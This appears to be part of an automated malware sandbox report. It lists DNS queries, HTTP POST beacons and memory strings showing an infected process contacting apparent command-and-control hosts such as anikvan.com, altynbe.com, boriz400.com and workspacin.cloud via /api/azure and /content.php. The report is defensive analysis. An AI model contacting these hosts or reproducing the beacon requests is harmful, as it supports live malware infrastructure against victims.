Source: global traffic | HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: anikvan.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /live/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: workspacin.cloud | Content-Length: 248 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: anikvan.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /live/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: workspacin.cloud | Content-Length: 180 | Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe | Code function: 22_2_013A4004 InternetReadFile,22_2_013A4004
Source: global traffic | DNS traffic detected: DNS query: boriz400.com
Source: global traffic | DNS traffic detected: DNS query: altynbe.com
Source: global traffic | DNS traffic detected: DNS query: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io
Source: global traffic | DNS traffic detected: DNS query: anikvan.com
Source: global traffic | DNS traffic detected: DNS query: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
Source: global traffic | DNS traffic detected: DNS query: workspacin.cloud
Source: unknown | HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: boriz400.com | Content-Length: 538 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 May 2024 22:04:29 GMT | Content-Type: text/plain; charset=utf-8 | Content-Length: 9 | Connection: close | Strict-Transport-Security: max-age=15724800; includeSubDomains
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 May 2024 22:04:54 GMT | Content-Type: text/plain; charset=utf-8 | Content-Length: 9 | Connection: close | Strict-Transport-Security: max-age=15724800; includeSubDomains
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 May 2024 22:05:03 GMT | Content-Type: text/plain; charset=utf-8 | Content-Length: 9 | Connection: close | Strict-Transport-Security: max-age=15724800; includeSubDomains
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 May 2024 22:05:21 GMT | Content-Type: text/plain; charset=utf-8 | Content-Length: 9 | Connection: close | Strict-Transport-Security: max-age=15724800; includeSubDomains
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000016.00000000.1850142884.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.1847476814.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2941807069.0000000007F40000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: Amcache.hve.9.dr | String found in binary or memory: http://upx.sf.net
Source: explorer.exe, 00000016.00000000.1859052974.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2945734291.000000000C964000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000016.00000002.2945734291.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C893000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/odirmr
Source: rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/
Source: rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/5~
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/=~
Source: rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/B_F
Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/U~
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/X
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/api/azure
Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/api/azureontent.phpMfE
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/api/azurep
Source: rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/api/azureure
Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/content.php
Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/content.php2f
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/d
Source: rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/db-53011b87bd06
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/ic
Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/tyk.io
Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
Source: rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/
Source: rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/I~
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738816096.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/api/azure
Source: rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738816096.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/api/azure==
Source: rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/api/azuret.php.f
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/content.php
Source: rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/content.php.f
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/content.phpGf
Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/d
Source: rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/db-53011b87bd06
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/ic
Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000016.00000000.1845325737.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2938934418.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2937197092.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000016.00000000.1847916203.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000016.00000000.1847916203.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://boriz400.com/
Source: rundll32.exe, 00000012.00000003.2810418995.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921159E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.000002921159F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://boriz400.com/api/azure
